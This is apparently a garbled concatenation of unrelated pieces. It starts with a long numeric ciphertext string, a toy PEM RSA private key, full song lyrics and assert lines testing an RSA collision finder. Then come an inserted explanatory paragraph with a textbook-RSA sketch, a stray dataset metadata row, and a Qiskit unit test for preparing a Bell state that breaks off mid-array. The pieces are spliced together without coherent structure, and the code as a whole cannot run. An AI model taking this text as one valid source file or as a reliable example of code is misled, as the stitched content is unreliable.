78227929230094578765333050008127005624210040668449723430147980503904370013342937439130137278828357430154011508613020063254737123650071921677907070152708181784230158781749537490008189314504620118429460731130165759468883370008875224642070118364349050780009646342806250143487350835540159525629747410115416729093620101747211317650095276882889310148940324589300066520247716340085315025863930130784131281690037699978018300109540655538470093918330023390079656048492880020703674731150085742274997420067051714325890123169908941570041285859845240119633306445070111417909798950079403729681770033304043293570017705503598040124113775062560066387220058600101543565021180090487835707850057675605627700027832487042280030276904755870127790025424250037616093112110089326338179350029890323895880027614068617350129547696892580126701914703540130769625624090118619984929080096174602900590074365772742190133335072553140155670760406280105228697938940069019811663820123238178156280133914677224950143654251673520043738054104590013342937439130053810272736940018516857501390097532367782350074365772742190133914677224950091956278939390132038605478480120531998818630062006802281160130462285278180012216529011400033942181236380144770098274160057962449750350166744691657030020994789819530118919488513380080800319198950000365765580810049240468349300162542151639430111417909798950068680369618150080472953159640026063703551830020268644415620077357410203950129198331415060100489656597710069360589975740074365772742190134057724052620128558910439210062006802281160130462285278180098816906812220052671169414640021982984938300163661711181290066387220058600022283262460340109597153413270142535811447250115280334265140080365754530630152708181784230158781749537490008189314504620118429460731130109123670224050082254944008870065833124828350036455520882980115583318262580074560347865240051847315396350062451106035490048244557250210152705908453250123169908941570003431069555900043335398671510015501263640500141892598670950076930588560450131377322
61840002724690783805010174721131765015070027910964001558473447668003367838682724003394218123638016541970368602000662114234670014448481175886005395910800602006069472226690004419844516881001769401402805013377898801379015505412727486009295838517423004254754985104007070244200909007456034786524007456034786524005177141280428003134690610872012316990894157010427938388756007146163944582012493965054170016007259597362015797328196975011365573932242004551506953744000974062963904006391741624299006607846410233016674469165703012825151981781011269559233022010174721131765015070027910964001558473447668005177141280428008656215682341006825477513652008530761324364015203619611516002746754410520005242975109009014798050390437007018203479960015632738922519014025094925087002128628339401001851685750139013336620841864002617676767815008949130702871005128193188355016006295107657008531502586393009455173853522012957753358511006002627824170001714766518858001851685750139009746274089064008574227499742015632738922519012939859141731004499829145700007940372968177003330404329357001770550359804016554054769993006167420684634007959274652850001221652901140001195493477279002894336112277014038113860762005123498260429011960824239288003711015117455007735741020395002026864441562007332898381330001115022710746000528620124222016249079904860010629453070528002706165500866006839050583955003762885659935005012511825736000313573741305015244533103743006420894793418002198298493830016541970368602013391467722495010717509250326015071510897841005866605915194005012511825736005526849650853013203860547848000868409255250011022218530902015686132030204011501462214276006093074585621015174682178872009596891879853009003640080305009307822792923009457876533305012681037832545009966023315029009271199151328010941129162202014830101351785003501116603398013336620841864015797328196975012867032378415007662603625841012939859141731002191926147728006848404977227005383475533041003416956873965014166500365650004569841440447008297261991690002617676767815
00742193370688900487206900635000202686444156201114179097989500988169068122200526711694146400597183424740201527081817842301587817495374900081893145046201483428709984900376288565993500938535429525101603919280939301675938226680600441984451688100884123162560901027419884432601520361961151600025681255430600208620541474900773396735038900313469061087200747993502374100658331248283501563273892251900748633924140100261767676781500959689187985300900364008030501189194885133801228325316456301339146772249501429243754134401304197010515800474806725923900715538351531501479633112508400303316881346300136728028375601307841312816900043597654901501544288600886800843817174903301624907990486001062945307052800270616550086600884123162560900398897197621001454861979083301494833438066100804613949771300988169068122201217010715336600794037296817700333040432935700177055035980401535562442967601575192070819400944013654439200336783868272400339421812363801654197036860201382953302227501630547059370001454861979083300857422749974200769305885604501313773226184000485979780858701494833438066100804613949771301215730852536201295476968925801081514910487800501251182573600552684965085301320386054784800203221664303101295129138449600609307458562100958627906839601336156586956201155833182625801370692488514300447367425012600150626828498701630929741028800822549440088700654076452813001493275444681301441747320731601307696256240900084571530291800779362387637500540194151750600944013654439200547061235684701273819318565901608984644136600234419804955600806620523736700082956486951200512349826042901196082423928800043865844183900746283079989101501466341285900339421812363801169002046808100217673955801901532382496388300474340708504400358087886561601517468217887200371101511745500773574102039500202686444156200208620541474901295775335851100690198116638201232381781562801339146772249500364555208829800533381981416900461148579566900929887621580200376999780183001324559822660600842378973031000545420188818900193993410052801228325316456301154
16729093620115709730611720070182034799600043102676530890014885148439620126422852818250063977040651170002568125543060021982984938300071461639445820077936238763750151746821788720051234982604290047285600018140104875860380990027990067232510127381931856590054464277886930040484038663500040655120535720036773311261330071549576300240060930745856210151746821788720118919488513380074562550628000117630325661140084859705824020099660233150290092711991513280030331688134630085315025863930130784131281690101513834432860020268644415620095480572919380101511912961870017705503598040046018750034210112065252504570064470439640470014137898476300058666059151940150720851534910057807295627840058261185711110093078227929230076323145437370025386612855800166744691657030128251519817810112695592330220101747211317650150700279109640015584734476680027990067232510085991460723900163092974102880080030385682090109123670224050120531998818630132352128456390036684354385070085517780849270121121614066460126351572112070133385841109670098816906812220023652782668030138218635315410092722333367270133914677224950139162496889570045748850988770077936238763750086849646391380085742274997420029821246467880045991054028520018516857501390142492869577500124245140480160068069865220520161365276515610038276799896720067407707670020029603748764090068390505839550037628856599350041545136997910145404739028300137076915075830103170610961710087533025790730013672802837560133914677224950001575022454480036455520882980121573085253620101203458316910048720690063500020268644415620091956278939390151746821788720147908589011860107627360784820032577775024350060694722266900112381142787690061944891541890160767900855750005497059044240165598783053070127219740232430143262761615600079095210787000114685097461860056690282909770098816906812220023652782668030043102676530890011954934772790080800319198950123169908941570018516857501390091956278939390151746821788720008684092552500063416446025700002435133525200138424987912390101203458316910145404739028300137076915
07583010317061096171016759382266806009597844442131012157308525362014422929915482006200680228116013046228527818013829533022275004499829145700008949130702871013811707763375004864079117141005444711924717011773538969558001939934100528012283253164563001066838768545000117097987440008114642198784014834287099849006607846410233005444711924717011773538969558014025094925087007240859551243000489740235754014508384835228005012511825736013964885786606005128193188355014025094925087003460857216688002191926147728011501462214276015203619611516002746754410520010174721131765015070027910964001558473447668001714766518858001851685750139006397704065117000256812554306014365425167352004373805410459001334293743913005381027273694001851685750139001500381928153008531502586393001851685750139007295402543537010286200158506006325473712365001550126364050014189259867095003645552088298011558331826258007456034786524006818741015715006485752347349014894032458930010643338753389006200680228116006930515205618011416780755075012547003942424012642285281825011141790979895000735678430692007462830799891001939934100528016711625307562008701642408962005866605915194004333539867151001550126364050014189259867095007693058856045013137732261840002724690783805006002627824170013822026924529007904380352052015632738922519015323566523412002668412257343012939859141731002191926147728006848404977227000591445998278014548619790833014251626468826002026864441562006420894793418007456034786524007456034786524016750580417555015916272083643012316990894157003367838682724003394218123638016541970368602015459404875273011558331826258012246468845410002006088656111014212398844681012751993839690006583312482835002198298493830015790271465657004490008403804002128628339401001851685750139006583312482835005591799096884010717074350334011973650000418016130684304887007736814870577008171973624823010427938388756006281914246775009907178993727004338286972057016249079904860010629453070528015434168669565012830525041187016007259597362008167647662251001114701381260
00262055450945700339421812363801295476968925800029421655869001052198714569901367453730491800124965325201100855177808492700449000840380400212862833940100185168575013901429243754134401304197010515800544471192471701177353896955801532356652341200808003191989501231699089415700890246804487900333454678491701070864129102600648575234734901293985914173101342247707495401545940487527300203541348405200794037296817700993855779897300568782460397501191897760568200457101385444000356913266601800916433793861800840078953171800524297510900901479805039043700701820347996001333350725531401270947728316400860637262964300178197645915800033822038457401348543208357300538476553175700916433793861800857422749974201320386054784800801556509839101441843438443201441747320731601394147595379100042872793889000206076673721701418925986709500736828408139901514237980031301044270372178701479633112508400154792562348801228325316456300773396735038900043865844183900073150358634500816764766225100919562789393901517468217887200931421401422600383866983384200106683876854500988169068122200236527826680300745603478652400745603478652400563382215223000795927465285001084413883425500907250933124601264795724587200959689187985300546690188220901335199002940100544642778869300404840386635001579027146565700794037296817700447024166343700266841225734300632547371236501102221853090201568613203020401545940487527300952768828893100748633924140100261767676781500547061235684701421817069325901381170776337501150146221427600492404683493001625421516394301593098003532801658994252193300452822702421801196082423928800473507408445900004692668326901274686385207501277900254242500780970296384900881204803763400412927489443900081893145046201556634890308301196333064450700729540254353701028620015850601293985914173100449982914570000222832624603401095971534132701342166120826200916433793861800857422749974200376999780183000011709798744000811464219878400956769709442801113984060037200382767998967200674077076700200296037487640901484358600590400148308201610000985
77875477290076212197519400079403729681770077936238763750086849646391380085742274997420124245140480160029323906225240017366685589550062006802281160130462285278180143827460836900098577875477290076212197519400094007335169620079403729681770095978444421310144770098274160057962449750350012216529011400155670760406280149327544468130065407645281300098716049327120126479572458720018178116896860141279884329440010073577937430047434070850440035808788656160151746821788720051234982604290119608242392880029890323895880144648793840070091956278939390151746821788720155670760406280050469571602970053959108006020002435133525200108441388342550058261185711110068484049772270129223210669680005914459982780133914677224950000889496448330128353817455340133366208418640094401365443920094007335169620068187410157150064857523473490148940324589300159162720836430123169908941570049856207202150038276799896720067407707670020016871372170440076930588560450131377322618400048597978085870127790025424250037616093112110142345029081880154332355079530084007895317180069019811663820123238178156280133914677224950071461639445820077936238763750151746821788720031346906108720123169908941570115014622142760068187410157150064857523473490140250949250870025393648364810074379725570670167505804175550074370221377010085517780849270133869813360340069531733263470065833124828350073682840813990151423798003130104427037217870017694014028050133778988013790077991134754340155054127274860030867099532000109123670224050092652389821380159319859031070081719736248230064470439640470014137898476300058666059151940166589750959580060930745856210069322819499220099660233150290058431756414460049164874497220080461394977130132829969618690027990067232510126815227374330154332355079530093078227929230094578765333050020306387552970062006802281160130462285278180044900084038040103807483901170034552267215290127381931856590160898464413660141665003656500167116253075620111417909798950144770098274160057962449750350050125118257360055268496508530100674497284500091444736
58506003304487947724007511614658720005446427788693004048403866350004065512053572003677331126133007154957630024009400733516962001221652901140006069472226690013422477074954005609393903728007147612444061001851685750139003887054071095005331000381868004065512053572003677331126133015434168669565007295402543537010286200158506015014663412859006607846410233004177563013608008460085447165013092751148561008080031919895012316990894157004504101350900000941985584715009548057291938003887054071095013178642700357012283253164563007733967350389012647957245872001817811689686014127988432944014355483448889006969046539612014464879384007010717509250326015071510897841005866605915194005633822152230010168260536245016487793270060012455920572176011410523180396002198298493830005631555756536013386981336034003257777502435005826118571111006848404977227000591445998278014548619790833014251626468826002026864441562001500381928153008531502586393001851685750139012289488001446016187024821022000884956345795011573908551276001321627865559008656215682341002989032389588016722351909582001629198308243007107780236169002382453600199004310267653089011139840600372013728890255301016759382266806011238114278769006194489154189016649816978952010317061096171015323566523412000428727938890002060766737217014189259867095013137108347576012733616700211003237268499702014843586005904010411796798878008080031919895000036576558081006093074585621015174682178872005633822152230015701326909369002989032389588010428734854556002783248704228003027690475587012779002542425003762885659935004748067259239016140655633015009244344959668008003038568209016076790085575006341644602570000243513352520003936744511619001246949052239007662603625841012246468845410011918977605682004571013854440014634277840369015547020555909014189259867095001334293743913004310267653089001488514843962006325473712365013902379037882008820088701974013893830472615004588267489413008220628671002009144473675009011573908551276001321627865559004177563013608008460085447165013092751148561
00808003191989501231699089415700185168575013900538102727369400185168575013900133429374391300909989313546500004692668326900501251182573601396488578660600512819318835500632547371236500155012636405001418925986709501261446935222900904491175566401418925986709501379457918873801339146772249501228948800144601618702482102200088495634579501539208094321601543323550795301065204937100201273819318565901320386054784800154792562348800996575755108701245592057217600400692793633800185168575013901015119129618700177055035980400122165290114000284284176120001672235190958200020795192897100133429374391301441747320731600829726199169000816764766225100538102727369400185168575013901636617111812900663872200586000474806725923901614065563301500924434495966800429694926273501532382496388300474340708504400358087886561601517468217887200371101511745500812246962301100293239062252401633338604014800384734042151900560939390372800714761244406100185168575013900124694905223900745603478652400684840497722700538347553304100341695687396500606947222669001342247707495401211216140664601263515721120701333858411096701655405476999300112599060791600433353986715100634164460257000024351335252000659269109077600495836789564300398698935383000185168575013900654076452813001493275444681301389383047261501015138344328600202686444156201071750925032601507151089784100586660591519400681874101571500961967918846000162919830824300044646742789501293985914173100606947222669001188537228237800150038192815300853150258639300155784641778901157390855127600452217309026601184294607311301091236702240500415451369979100383866983384200106683876854500474806725923901614065563301500924434495966800154792562348800734336739102400491521545786400855177808492701517468217887200501251182573600031357374130500458286933075201357922596835601270947728316401441843438443200804613949771300049682769446801273819318565901160364863185100819835017886900046637866430300574557722569301400709114937000996602331502900584317564144600733289838133000111502271074600052862012422200298
90323895880082254944008870143654251673520043738054104590013342937439130073682840813990151423798003130098607948398360065407645281300149327544468130145083848352280127381931856590021982984938300144174732073160042969492627350087804837302920053127778356260148940324589300101203458316910145404739028300125675405329820065833124828350165419703686020010668387685450029890323895880104287348545560027832487042280030276904755870127790025424250078097029638490101747211317650095276882889310153235665234120134057724052620130462285278180093078227929230094578765333050119882933974960085315025863930101852166341520148514737766120082206286710020030776120476150095480572919380040655120535720036773311261330071549576300240143827460836900098577875477290076212197519400126479572458720029890323895880167223519095820099658171146830103170610961710126422852818250073682840813990151423798003130098607948398360001575022454480043535065691500056338221522300101682605362450068390505839550037616093112110080472953159640133914677224950128305250411870167505804175550167223519095820002079519289710013342937439130142492869577500163661711181290066387220058600086562156823410068680369618150090263999802780027242296153540001340718275620143654251673520043738054104590013342937439130101511912961870017705503598040044900084038040043584483431680150715108978410074863392414010157973281969750054464277886930040484038663500035128843021870128163362401450037628856599350068680369618150013672802837560133914677224950132038605478480080030385682090115589779722910051854890082370053495095552440023092009360440098816906812220027246907838050147963311250840109411291622020080662052373670008295648695120070253284678470041390447424880058666059151940152272609087650124924608683760110781774935800069979495234150037705976477380074379725570670126479572458720018178116896860141279884329440143654251673520043738054104590013342937439130097462740890640085742274997420043102676530890093142140142260003941684146970152710960179960068484049772270005914459982780145486197
90833014251626468826002026864441562007436577274219013405772405262000652958172135011238114278769006194489154189006652024771634008531502586393007733967350389009400733516962007965604849288002070367473115008574227499742010151191296187001770550359804006776826304772010603941539376012529297655566015777939568987014043889968350013245390369413011206525250457005123498260429004569841440447001334293743913009746274089064008574227499742007456034786524007456034786524013282996961869002344198049556007436577274219013333507255314006069472226690009597844442131009655317025628013137108347576008047295315964015174682178872005621194910096006839050583955003761609311211001334293743913004065512053572003677331126133007154957630024012634375765651006540764528130001452657707862003847340421519013919718206350000940132202926007486339241401014829338048339015174682178872001167281739301004006927936338007662603625841012939859141731002304971496047011861998492908001851685750139012721974023243009196212734568001747076301974004198556140857000134071827562006726663636796003580878865616016007259597362006333401836156010317061096171014233066358253016542257322404007147612444061013391467722495007437972557067004128585984524011963330644507007146163944582007793623876375015174682178872008656215682341009307822792923007632314543737002538661285580015567076040628001367280283756001413552327622001769401402805013377898801379001399694824573010286200158506003304487947724007511614658720000435976549015015442886008868008438171749033012647957245872001817811689686002593765472517008812048037634004129274894439000818931450462015566348903083010959715341327010389940222188002304971496047002128628339401001851685750139014249286957750002288718413881013629188835445016649816978952002539364836481007437972557067006848404977227005383475533041003416956873965011139840600372006200680228116013046228527818014477009827416005796244975035006953173326347005863378239525007940372968177007105784793783000177659298586004490484309170009026399980278002724229615354
00013407182756201016497134226501269419874188501324559822660600013662484812101304622852781800268599210913000684840497722700059144599827801454861979083301425162646882600202686444156200714616394458200779362387637501517468217887201535562442967601575192070819400545420188818900794037296817700447024166343700304956312188701454861979083300840078953171801155485374752200114508694527301295476968925800024351335252001434873508355401441843438443201320386054784800829726199169000846008544716501541479622316101535852334093001114179097989500544471192471701177353896955801293985914173101375794005232000415637675202901320386054784801670886160273000582611857111101211216140664601263515721120701333858411096700417756301360800846008544716500065295817213500092660185488400868434975503100695317332634700498746174125400954805729193801654197036860201339146772249500100735779374300474340708504400358087886561601517468217887200996575755108701441843438443200043597654901501544288600886800843817174903300695317332634700498746174125400228871841388101362918883544501607679008557500710778023616900238245360019901228948800144601618702482102200088495634579500959689187985300900364008030500492404683493001625421516394300133429374391300670517143258901231699089415700412858598452401196333064450700431026765308900128123521054900660784641023301108227747501400978996573543400081254177605801064068406862800412927489443900081893145046200996581711468300253936483648100743797255706701277900254242500376288565993500946637177692600133429374391301379457918873801339146772249501258272899005501049316065429301313016623749500959689187985300900364008030501042793838875600628191424677500990717899372700433828697205701655405476999300112599060791601157390855127600452217309026600162919830824301392127161226100432400235583200693605899757400266841225734301399601826920300684538439096401264228528182500769305885604501313773226184000485979780858700609307458562101356307218710700959784444213100946637177692601049148854637301655405476999300616742068463400795
92746528500006621142346700144484811758860053959108006020033942181236380116900204680810021767395580190157651916521500149327544468130097462740890640085742274997420020862054147490130784131281690143654251673520043738054104590104914885463730050125118257360055268496508530100674497284500091444736750090134130644735400103899402221880083380477024200069043279351720026684122573430008684092552500077164528942760080472953159640037110151174550077357410203950020268644415620122894880014460161870248210220008849563457950132829969618690098577875477290076212197519400068187410157150064857523473490118364349050780105405664917860050423157319230037389321373700127381931856590091444736750090160345319957900041775630136080084600854471650070182034799600001575022454480043535065691500138295330222750044998291457000060930745856210122531709941140008457153029180077936238763750048156107119900013672802837560010668387685450098816906812220121145572747110165419703686020133914677224950072954025435370102862001585060019399341005280159358679908780051771412804280050125118257360010175596168800114685097461860056690282909770152036196115160002568125543060144174732073160129167404216220127381931856590160898464413660023049714960470021286283394010089024680448790077368148705770081719736248230051847315396350062451106035490106598171370360080472953159640138295330222750163054705937000145486197908330085742274997420000889496448330128353817455340128558910439210051377035688640085742274997420068482790021960154594048752730050573851059350133914677224950143654251673520043738054104590013342937439130106647279574640027769929495070068484049772270053834755330410034169568739650119361437713320089821187058130002413118884270153235665234120028943361122770140381138607620154594048752730020354134840520060930745856210024650711701340074365772742190133335072553140008684092552500017009476369030081676476622510074365772742190133914677224950081224696230110020604806054100000889496448330128353817455340101852166341520119633306445070116036486318510081983501
78869015062761162561006814591522844010427938388756007146163944582009219587523394012939859141731013422477074954004581410627003006848404977227000591445998278014548619790833014251626468826002026864441562001114701381260002620554509457003394218123638009857787547729007032299236067003134690610872012316990894157011501462214276007940372968177007105784793783000177659298586006325473712365016459544011589007018203479960012951291384496004338286972057004581410627003009596891879853009003640080305009881690681222005267116941464007436577274219013405772405262016412964923076014540473902830012567540532982012341698838680006878882862235011141790979895002799006723251012681522737433015433235507953004924046834930016254215163943011141790979895006953173326347004987461741254014739420964376003358447209108006583312482835004588267489413008220628671002009144473675009004490008403804004358448343168015071510897841011836434905078000964634280625012017659026366003847340421519007940372968177014467912537780004698006659192008982118705813008220628671002015434168669565014177516687646003963928832478002538661285580000752074324847015797328196975002153877683453006848404977227000591445998278014548619790833014251626468826002026864441562004065512053572003677331126133015434168669565011141790979895006093074585621015174682178872002685992109130000735678430692007462830799891010012927654544015931985903107008171973624823000343106955590013579225968356009314214014226004473674250126001506268284987016309297410288008225494400887013137108347576012733616700211007414758037855007735741020395002026864441562003769997801830009965757551087008606372629643001781976459158010520847887165015350504482251008902468044879008841231625609003988971976210014548619790833007940372968177016426241502039014830101351785003501116603398000652958172135004499829145700013829533022275010520847887165001367280283756013391467722495014397434916727007864904753961016459544011589007018203479960012951291384496004338286972057005123498260429004728560001814000358464286464
00228871841388101362918883544501607679008557500402810988858201197365000041801095971534132701038994022218801416650036565001370769150758301339146772249501389383047261500266841225734300234419804955600853150258639301285589104392100382767998967200674077076700200296037487640901479633112508401516811944381901076273607848201198005570462501370769150758300106683876854500158074247433700433828697205700421667635288900284284176120001664981697895201186199849290800253866128558000203221664303100482445572502100973741182193600692638602636100501251182573601164586663421001506276116256101613068430488700687888286223501114179097989500609307458562101517468217887201627472694842201320701744408700702532846784700413904474248800586660591519401535562442967600970707572313400743657727421901333350725531401577793956898701437652609630300894913070287100512819318835501224646884541001577793956898700944013654439200460187500342101171607076495101617472228491400707024420090901114179097989500563382215223000795927465285001084413883425500219192614772800684840497722700538347553304100341695687396501416650036565001228325316456301339146772249500043597654901501544288600886800843817174903300988169068122201217010715336601150146221427600894913070287101381170776337500486407911714100930782279292300945787653330500907468716504601672235190958200020795192897100133429374391301058691911274900884123162560900398897197621001454861979083300865621568234100298903238958800829726199169000816764766225100812246962301100293239062252401591627208364301231699089415701624907990486001062945307052801543416866956501436542516735200437380541045900133429374391300954805729193801015119129618700177055035980400460187500342101171607076495101617472228491400707024420090901160364863185100819835017886901084413883425500959784444213100959689187985300900364008030501263437576565100654076452813000501251182573601164586663421000046637866430300431026765308900148851484396201600629510765701152803342651400803657545306300702532846784700108863458084701012034583169100487
20690063500129198331415060117773140508700066588338772980065011960585080099660233150290092711991513280130769625624090103170610961710119736500004180119633306445070106598171370360080472953159640121126163624290009566042989450097213457519640128558910439210051377035688640084007895317180068390505839550037628856599350132455982266060001366248481210130462285278180093078227929230094578765333050078667625930410127381931856590160898464413660023441980495560115280334265140080365754530630015807424743370043382869720570042166763528890008684092552500027005217259320150863489266040152553003923540068187410157150093275523557280137069248851430145404739028300137076915075830103170610961710162741544349880085657666586570160072595973620081676476622510036455520882980115583318262580074560347865240047480672592390070182034799600107279622603710090987040480830074336534135080094007335169620022283262460340109597153413270143487350835540144184343844320047558515109980152553003923540095968918798530090036400803050139324923425010068069865220520119189776056820045710138544400106433387533890142181706932590138117077633750012216529011400033942181236380116900204680810036400009032370116900204680810004663786643030116036486318510081983501788690054019415175060081676476622510156436912879390076626036258410129398591417310112381142787690061944891541890144648793840070004359765490150154428860088680084381717490330126479572458720098816906812220131444283128120068390505839550037628856599350041545136997910038386698338420010668387685450166589750959580094663717769260013342937439130073682840813990151423798003130098607948398360134934113764240056690282909770093899695642700026684122573430129398591417310095978444421310152365046083840164870872307820147980503904370051088496873640020604806054100159309800353280152272609087650124924608683760110781774935800070253284678470010886345808470106433387533890149327544468130142492869577500132038605478480042969492627350015501263640500141892598670950071461639445820077936238763750151746821788720153556244
29676014634277840369016711625307562001334293743913009600151356998009514955584128000868409255250007107780236169002382453600199001007357793743004743407085044003580878865616015174682178872010427938388756007146163944582009219587523394003717826833242013235212845639003711015117455007295402543537010286200158506006325473712365007716452894276008047295315964013579225968356003394218123638007343367391024006868036961815009026399980278002724229615354000134071827562015930980035328009881690681222005267116941464005971834247402007940372968177007105784793783000177659298586014025094925087000845715302918007793623876375014406518632478006607846410233004333539867151000446467427895012246468845410009857787547729007032299236067016554054769993001125990607916002685992109130009881690681222002365278266803006705171432589012830525041187009235173908935009600151356998009514955584128000868409255250001550126364050014189259867095006583312482835014292437541344013041970105158011573908551276001321627865559004177563013608009440136544392004748067259239007462830799891003033168813463009026399980278002724229615354000134071827562008046139497713000496827694468002953867569071008812048037634004129274894439000818931450462014834287099849006069472226690002191926147728002685992109130000438658441839002030638755297003827679989672006740770767002001687137217044001500381928153008531502586393008902468044879004574885098877007793623876375008684964639138008574227499742008460085447165005421117295876016248372865338007904380352052004611485795669009298876215802008819883359679000489740235754011548871952317002783248704228003027690475587005184731539635006245110603549012289488001446016187024821022000884956345795011033641921192008162521356691008919384474572000517439375931013235212845639007940372968177009597844442131005633822152230015701326909369001580742474337004338286972057004216676352889015567076040628012738193185659016089846441366006069472226690009597844442131002989032389588014464879384007011297858169016006793630667103006391741624299
008982118705813008220628671002015434168669565005745577225693004296949262735015323824963883004743407085044003580878865616015174682178872008949130702871005128193188355012246468845410012954769689258012647957245872007025328467847001088634580847009707075723134014830101351785003501116603398013092751148561001246949052239007662603625841006325473712365011022218530902015686132030204015072085153491005780729562784005826118571111012779002542425003762885659935012647957245872006953173326347006583312482835011297858169016006793630667103013941475953791008080031919895012316990894157001851685750139001334293743913015930980035328013932492342501012111689626333015174175406777007578669806223"
sec = """-----BEGIN RSA PRIVATE KEY-----
MDACAQACBg8+c+YhIQIDAQABAgUBmHduAQIDPg+BAgM+4aECAzl4AQIDOqFBAgMl
1zU=
-----END RSA PRIVATE KEY-----"""
mes1 = """
I'm taking over my body, back in control, no more shotty
I bet a lot of me was lost
't's uncrossed and 'I's undotted
I fought it a lot and it seems a lot like flesh is all I got
Not anymore, flesh out the door, swat
I must've forgot, you can't trust me
I'm open a moment and close when you show it
Before you know it I'm lost at sea
And now that I write and think about it
And the story unfolds
You should take my life, you should take my soul
You are surrounding all my surroundings
Sounding down the mountain range
Of my left-side brain
You are surrounding all my surroundings
Twisting the kaleidoscope behind both of my eyes
And I'll be holding on to you
Remember the moment
You know exactly where you're going
'Cause the next moment, before you know it
Time is slowing and it's frozen still
And the window sill looks really nice, right?
You think twice about your life
It probably happens at night, right?
Fight it, take the pain, ignite it
Tie a noose around your mind loose
Enough to breathe fine and tie it
To a tree, tell it
"You belong to me
This ain't a noose, this is a leash
And I have news for you: you must obey me."
You are surrounding all my surroundings
Sounding down the mountain range
Of my left-side brain
You are surrounding all my surroundings
Twisting the kaleidoscope behind both of my eyes
Entertain my faith (10x)
Lean with it, rock with it
When we gonna stop with it
Lyrics that mean nothing
We were gifted with thought
Is it time to move our feet to an introspective beat
It ain't the speakers that bump hearts
It's our hearts that make the beat
And I'll be holding on to you (8x)
"""
sec2 = collision_finder(mes1, cipher, sec)
mes2 = decryption(cipher, sec2)
assert mes1 == mes2
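The helpers `collision_finder` and `decryption` are defined elsewhere in this file and are not shown here. Judging from the PEM-encoded key above, the scheme is presumably textbook RSA, where decrypting one block is a single modular exponentiation. A minimal, self-contained sketch with a toy key (all numbers below are illustrative and unrelated to the key material above):

```python
# Hedged sketch: textbook RSA on small integers. Toy key: p = 61, q = 53,
# so n = 3233, e = 17, d = 2753 (17 * 2753 ≡ 1 mod φ(n) = 3120).
def rsa_encrypt_block(m: int, e: int, n: int) -> int:
    # c = m^e mod n -- textbook RSA, no padding
    return pow(m, e, n)

def rsa_decrypt_block(c: int, d: int, n: int) -> int:
    # m = c^d mod n
    return pow(c, d, n)

n, e, d = 3233, 17, 2753
message = 65
ciphertext = rsa_encrypt_block(message, e, n)
assert rsa_decrypt_block(ciphertext, d, n) == message
```

With such small block sizes, many plaintexts map to the same ciphertext block, which is what a collision finder like the one used above can exploit.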
c96c718a2ec9568bd89f01bbdea334d620e155df | 74,508 | py | Python | test/ibm_qiskit/entanglements/bipartite/TestQiskitBellState.py | rubenandrebarreiro/semi-quantum-conference-key-agreement-prototype | adefc5a43e4fb1c2b7926af5da93e346f96497c0 | ["MIT"] | null | null | null | """
] | null | null | null | """
Semi-Quantum Conference Key Agreement (SQCKA)
Author:
- Ruben Andre Barreiro (r.barreiro@campus.fct.unl.pt)
Supervisors:
- Andre Nuno Souto (ansouto@fc.ul.pt)
- Antonio Maria Ravara (aravara@fct.unl.pt)
Acknowledgments:
- Paulo Alexandre Mateus (pmat@math.ist.utl.pt)
"""
# Import Libraries and Packages
# Import Unittest for Python's Unitary Tests
import unittest
# Import N-Dimensional Arrays and Square Roots from NumPy
from numpy import array, sqrt
# Import Assert_All_Close from NumPy.Testing
from numpy.testing import assert_allclose
# Import Aer and execute from Qiskit
from qiskit import Aer, execute
# Import QiskitQuantumCircuit from IBM_Qiskit.Circuit
from src.ibm_qiskit.circuit import QiskitQuantumCircuit
# Import QiskitClassicalRegister from IBM_Qiskit.Circuit.Registers.Classical
from src.ibm_qiskit.circuit.registers.classical import QiskitClassicalRegister
# Import QiskitQuantumRegister from IBM_Qiskit.Circuit.Registers.Quantum
from src.ibm_qiskit.circuit.registers.quantum import QiskitQuantumRegister
# Import QiskitBellState from IBM_Qiskit.Entanglements.Bipartite
from src.ibm_qiskit.entanglements.bipartite import QiskitBellState
# Test Cases for preparing the Bell States
class PrepareBellStateTests(unittest.TestCase):
# Test #1 for preparing the Bell States
# Description of the Test Case:
# 1) The Quantum Circuit is created with a Quantum Register,
# with 2 Qubits initialized in the state |00⟩;
# 2) Preparation of the Bell State (EPR Pair): |ϕ^+⟩ = 1/sqrt(2) x (|00⟩ + |11⟩);
def test_prepare_epr_pair_bell_state_phi_plus(self):
# The number of Qubits and Bits, for Quantum and Classical Registers, respectively
num_qubits = num_bits = 2
# Creation of the IBM Qiskit's Quantum and Classical Registers
qiskit_quantum_register_epr_pair_bell_state_phi_plus = \
QiskitQuantumRegister.QiskitQuantumRegister("qrbellstatephiplus", num_qubits)
qiskit_classical_register_epr_pair_bell_state_phi_plus = \
QiskitClassicalRegister.QiskitClassicalRegister("crbellstatephiplus", num_bits)
# Creation of the IBM Qiskit's Quantum Circuit with one Quantum and one Classical Register
qiskit_quantum_circuit_2_qubits = \
QiskitQuantumCircuit.QiskitQuantumCircuit("qcbellstatephiplus",
qiskit_quantum_register_epr_pair_bell_state_phi_plus,
qiskit_classical_register_epr_pair_bell_state_phi_plus,
global_phase=0)
# Prepare the EPR Pair (Bell State) for 2 Qubits
qiskit_quantum_circuit_epr_pair_bell_state_phi_plus = QiskitBellState \
.QiskitBellState("bell_state_phi_plus_epr_pair",
"BELL_STATE_PHI_PLUS",
qiskit_quantum_circuit_2_qubits,
0, 1).prepare_bipartite_entanglement()
# Getting the Backend for the State Vector Representation
# (i.e., the Quantum State represented as State Vector)
state_vector_backend = Aer.get_backend('statevector_simulator')
# Execute the Quantum Circuit and store the Quantum State in a final state vector
final_state_vector = \
execute(qiskit_quantum_circuit_epr_pair_bell_state_phi_plus.quantum_circuit,
state_vector_backend).result().get_statevector()
# Create an array with Bell State's (EPR Pair) complex values
qiskit_epr_pair_bell_state_phi_plus_array = array([((1. / sqrt(2.)) + 0.j),
(0. + 0.j),
(0. + 0.j),
((1. / sqrt(2.)) + 0.j)])
# Assert All Close, from NumPy's Testing, for the State Vector of the Qubits,
# after the EPR Pair (Bell State) is prepared
assert_allclose(final_state_vector, qiskit_epr_pair_bell_state_phi_plus_array, rtol=1e-7, atol=1e-7)
# Dummy Assert Equal for Unittest
self.assertEqual(True, True)
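The wrapper classes above are repo-specific, but the circuit behind test #1 is just a Hadamard on qubit 0 followed by a CNOT. As a sketch independent of the repo's classes and of any simulator, the same |ϕ^+⟩ amplitudes can be checked with plain NumPy, using Qiskit's little-endian qubit ordering (an assumption about how the repo maps qubits to amplitudes):

```python
import numpy as np

# Single-qubit Hadamard; Qiskit orders basis states |q1 q0>, so a gate
# on qubit 0 sits in the rightmost slot of the Kronecker product.
H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)
H_on_q0 = np.kron(np.eye(2), H)
# CNOT with control q0 and target q1 in little-endian ordering:
# it swaps basis states |01> (index 1) and |11> (index 3).
CNOT = np.array([[1, 0, 0, 0],
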